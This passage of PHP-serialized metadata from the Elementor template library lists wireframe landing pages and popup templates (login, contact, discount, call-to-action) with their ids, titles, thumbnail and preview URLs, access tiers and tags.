Pages\",\"Portfolio\",\"Professional\",\"Project\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:123;a:21:{s:4:\"tmpl\";i:1448;s:2:\"id\";i:24677;s:5:\"title\";s:28:\"Wireframe – Services 4\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-4.jpg\";s:12:\"tmpl_created\";i:1653990233;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:102:\"[\"About\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:124;a:21:{s:4:\"tmpl\";i:1449;s:2:\"id\";i:24687;s:5:\"title\";s:28:\"Wireframe – Products 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Products-1.jpg\";s:12:\"tmpl_created\";i:1653990273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-products-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:128:\"[\"About\",\"Booking\",\"Business\",\"Clients\",\"Ecommerce\",\"Features\",\"Footer\",\"Landing Pages\",\"Products\",\"Sales\",\"Shop\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:125;a:21:{s:4:\"tmpl\";i:1450;s:2:\"id\";i:24706;s:5:\"title\";s:28:\"Wireframe – Services 5\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-5.jpg\";s:12:\"tmpl_created\";i:1653990322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:149:\"[\"About\",\"Booking\",\"Consulting\",\"Contact\",\"Doctor\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:126;a:21:{s:4:\"tmpl\";i:1451;s:2:\"id\";i:23604;s:5:\"title\";s:38:\"Classic | Subscribe | Nail Polish Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/38-Subscribe-Nail-Polish-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1660205114;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-subscribe-nail-polish-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:127;a:21:{s:4:\"tmpl\";i:1452;s:2:\"id\";i:23047;s:5:\"title\";s:46:\"Fly-In | Contact | Health & Fitness eBook\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small.jpg\";s:12:\"tmpl_created\";i:1660205149;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/fly-in-contact-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Contact\",\"Ebook\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:128;a:21:{s:4:\"tmpl\";i:1199;s:2:\"id\";i:18839;s:5:\"title\";s:27:\"Hello Bar | CTA | eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/05/350x250.png\";s:12:\"tmpl_created\";i:1621870603;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/hello-bar-cta-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:41:\"[\"Ecommerce\",\"Online Shop\",\"Sale\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:129;a:21:{s:4:\"tmpl\";i:1247;s:2:\"id\";i:21907;s:5:\"title\";s:50:\"Fly-In | Team Details | Electronic Music Festival\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/Kit-8-electronic-music-festival-CTA-image-1.jpg\";s:12:\"tmpl_created\";i:1646660881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/fly-in-team-details-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:130;a:21:{s:4:\"tmpl\";i:1253;s:2:\"id\";i:22162;s:5:\"title\";s:46:\"Full Screen | Menu | Electronic Music Festival\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/8-music-festival-Team-Details.jpg\";s:12:\"tmpl_created\";i:1647272934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:154:\"https://library.elementor.com/popups/full-screen-menu-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:131;a:21:{s:4:\"tmpl\";i:1254;s:2:\"id\";i:22172;s:5:\"title\";s:45:\"Classic | Discount | Health & Beauty Spa\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/health-beauty-spa-small.jpg\";s:12:\"tmpl_created\";i:1647273547;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-discount-popup-health-beauty-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:36:\"[\"Hair\",\"Health\",\"Sales\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:132;a:21:{s:4:\"tmpl\";i:1255;s:2:\"id\";i:22183;s:5:\"title\";s:44:\"Hello Bar | CTA | Environmental Organization\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/11-Environmental-Organization-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647274384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/hello-bar-cta-popup-environmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:133;a:21:{s:4:\"tmpl\";i:1256;s:2:\"id\";i:22195;s:5:\"title\";s:39:\"Classic | Discount | Italian Restaurant\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/restaurant-small.jpg\";s:12:\"tmpl_created\";i:1647329432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-discount-popup-italian-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Restaurant\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:134;a:21:{s:4:\"tmpl\";i:1257;s:2:\"id\";i:22210;s:5:\"title\";s:45:\"Bottom Bar | Discount | Technology Conference\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tech-conference-small.jpg\";s:12:\"tmpl_created\";i:1647330423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/bottom-bar-discount-popup-technology-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:38:\"[\"Conference\",\"Sales\",\"Save the Date\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:135;a:21:{s:4:\"tmpl\";i:1258;s:2:\"id\";i:22221;s:5:\"title\";s:32:\"Hello Bar | Menu | Tattoo Studio\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small-1.jpg\";s:12:\"tmpl_created\";i:1647330705;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/hello-bar-menu-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:17:\"[\"Header\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:136;a:21:{s:4:\"tmpl\";i:1259;s:2:\"id\";i:22231;s:5:\"title\";s:37:\"Full Screen | Booking | Tattoo Studio\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small.jpg\";s:12:\"tmpl_created\";i:1647331823;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-booking-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:137;a:21:{s:4:\"tmpl\";i:1260;s:2:\"id\";i:22251;s:5:\"title\";s:34:\"Classic | Discount | Dental Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/dental-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647332171;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-popup-dental-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Health\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:138;a:21:{s:4:\"tmpl\";i:1261;s:2:\"id\";i:22261;s:5:\"title\";s:34:\"Slide-In | Contact | Makeup Artist\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/20-Makeup-Artist-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647333946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/slide-in-contact-popup-makeup-artist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:139;a:21:{s:4:\"tmpl\";i:1262;s:2:\"id\";i:22271;s:5:\"title\";s:24:\"Fly-In | CTA | Headphone\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/headphones-1-small.jpg\";s:12:\"tmpl_created\";i:1647334784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-cta-popup-headphone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:41:\"[\"cta\",\"Ecommerce\",\"Marketing\",\"Product\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:140;a:21:{s:4:\"tmpl\";i:1263;s:2:\"id\";i:22277;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/online-course-2.jpg\";s:12:\"tmpl_created\";i:1647337110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-popup-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Course Online\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:141;a:21:{s:4:\"tmpl\";i:1264;s:2:\"id\";i:22283;s:5:\"title\";s:40:\"Bottom Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistant-3.jpg\";s:12:\"tmpl_created\";i:1647337517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-contact-popup-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:142;a:21:{s:4:\"tmpl\";i:1265;s:2:\"id\";i:22289;s:5:\"title\";s:32:\"Fly-In | Contact | Private Tutor\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-4.jpg\";s:12:\"tmpl_created\";i:1647337676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-contact-popup-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:27:\"[\"Contact\",\"Course Online\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:143;a:21:{s:4:\"tmpl\";i:1266;s:2:\"id\";i:22295;s:5:\"title\";s:31:\"Classic | Login | Login Travel\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/login-travel-6.jpg\";s:12:\"tmpl_created\";i:1647339467;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-login-popup-login-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:144;a:21:{s:4:\"tmpl\";i:1267;s:2:\"id\";i:22301;s:5:\"title\";s:36:\"Full Screen | Login | Login Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/login-business-7.jpg\";s:12:\"tmpl_created\";i:1647339782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/full-screen-login-popup-login-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:16:\"[\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:145;a:21:{s:4:\"tmpl\";i:1268;s:2:\"id\";i:22307;s:5:\"title\";s:28:\"Classic | Login | Login Blog\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/login-blog-8.jpg\";s:12:\"tmpl_created\";i:1647339986;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-login-popup-login-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:146;a:21:{s:4:\"tmpl\";i:1269;s:2:\"id\";i:22313;s:5:\"title\";s:31:\"Classic | Login | Login Fashion\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/login-fashion-9.jpg\";s:12:\"tmpl_created\";i:1647340204;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-login-popup-login-fashion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Fashion\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:147;a:21:{s:4:\"tmpl\";i:1270;s:2:\"id\";i:22319;s:5:\"title\";s:40:\"Classic | Login | Login Design Platform\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/03/login-design-platform-10.jpg\";s:12:\"tmpl_created\";i:1647340531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-login-popup-login-design-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Design\",\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:148;a:21:{s:4:\"tmpl\";i:1271;s:2:\"id\";i:22325;s:5:\"title\";s:36:\"Fly-In | Contact | Digital Marketing\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-marketing-11.jpg\";s:12:\"tmpl_created\";i:1647340770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-contact-popup-digital-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:51:\"[\"Business\",\"Contact\",\"Digital 